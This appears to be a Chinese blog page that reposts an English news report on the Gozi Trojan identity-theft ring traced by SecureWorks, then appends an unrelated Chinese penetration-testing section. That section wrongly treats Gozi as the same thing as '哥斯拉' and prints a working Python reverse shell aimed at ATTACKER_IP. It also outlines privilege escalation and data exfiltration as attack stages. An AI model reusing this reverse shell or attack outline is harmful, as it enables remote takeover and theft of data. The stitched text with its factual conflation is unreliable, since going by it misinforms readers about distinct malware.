Russian (Gozi) Trojan powering massive ID-theft ring

研究人员发现了一种名为Gozi的高级木马,已从美国数千台受感染的家庭电脑中盗取了超过1万个账户记录,涉及全球顶级银行、零售商及在线服务。该木马还窃取了政府机构员工及医疗患者的敏感信息。

Researchers at SecureWorks have stumbled upon what appears to be a massive identity theft ring using state-of-the-art Trojan code to steal confidential data from thousands of infected machines in the U.S.

The Trojan, which connects to a server in Russia, has so far pilfered information from more than 5,200 home computers with 10,000 account records. The records retrieved included account numbers and passwords from clients of many of the top global banks and financial services companies (over 30 banks and credit unions were represented), the top US retailers, and the leading online retailers.

"The stolen data also contained numerous user accounts and passwords for employees working for federal, state and local government agencies, as well national and local law enforcement agencies. The stolen data also contained patient medical information, via healthcare employees and healthcare patients, whose username and passwords had been compromised via their home PC," Jackson said.

In a fascinating blow-by-blow description posted online, SecureWorks researcher Don Jackson explained how he reverse-engineered the Trojan (named Gozi) and traced it back to a Russian mothership server that contained information and employee login information for confidential government and law enforcement applications.

This data was being offered for sale by Russian Hackers for an amount totaling over $2 million. The subscription service hawking the stolen information has been disabled but, as of today, the server hosting the data is still receiving stolen data.

  • Steals SSL data using advanced Winsock2 functionality
  • Users state-of-the-art, modularized trojan code
  • Launch attacks through Internet Explorer browser exploits
  • Users customized server/database code to collect sensitive data
  • Offers a customer interface for online purchases of stolen data
  • Steals data primarily from infected home PCs
  • Accounts at top financial, retail, health care, and government services affected
  • The black market value of the stolen data is at least $2 million 

Even more worrying, Jackson found that the Trojan went undetected for several weeks (and, in some cases, months) by many anti-virus vendors. He also warned that there are two other known Gozi variants making the rounds, which suggests this isn't the last we've heard of Gozi.

As of the publication date, the server used by the Gozi trojan is still up. The server status is as follows:

  • Still processing data from existing trojan infections
  • Still allowing new infections to "register" themselves
  • Still accepting and processing stolen data from new infections
  • The large cache of stolen data has been removed
  • The admin interface used to add subscriptions has been removed
  • The customer interface used to buy stolen data has been removed
  • The server is no longer hosting any executables  

(See Jackson's description of the identity-theft operation connected to the Gozi Trojan). 

### 关于哥斯拉命令执行及其在渗透测试中的应用 哥斯拉(Gozi)通常指的是一种恶意软件家族,其主要功能是在受感染的目标系统上实现持久化访问以及数据窃取。然而,在某些情况下,“哥斯拉”也可能被用于描述一种自定义开发的后门工具或脚本,特别是在红队操作中使用的payload生成器和服务端程序。 对于命令执行问题而言,这通常是通过某种形式的远程代码执行漏洞或者合法管理接口滥用来达成的目的。例如,在内网渗透过程中,如果已经获取到目标主机的部分控制权,则可以尝试使用多种技术手段进一步提升权限并建立稳定的交互通道[^2]。 以下是几个常见的与之相关的概念和技术: #### Payload 的构建 为了有效地完成任务,攻击者往往需要创建特定的有效载荷 (Payload),这些有效载荷能够绕过现有的防御机制如防病毒软件检测等。下面是一个简单的 Python 脚本来演示如何生成基础类型的反向 shell Payload: ```python import socket, subprocess, os; def reverse_shell(ip,port): s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,int(port))) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) reverse_shell('ATTACKER_IP', 'PORT') ``` 请注意上述代码仅为教学用途展示原理,请勿非法使用! 此外还有其他更复杂的方法比如借助 Metasploit Framework 来定制适合不同场景需求的各种高级 Payloads。 #### 提升权限 一旦获得了初步立足点之后,下一步就是寻找机会提高当前用户的权限级别直至获得完全控制系统的能力——即所谓的 “提权”。在这个阶段可能会涉及到利用本地存在的零日缺陷或者是已知但尚未修补的安全隐患来进行突破。 #### 数据提取 最后一步则是尽可能多地收集有价值的信息并将它们安全地传输回自己的服务器之中去分析处理。这其中可能包括但不限于敏感文件读取、网络流量监控记录等等活动。 总之,在整个流程里每一步都需要精心策划并与实际情况相结合灵活调整策略才能取得最终成功。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值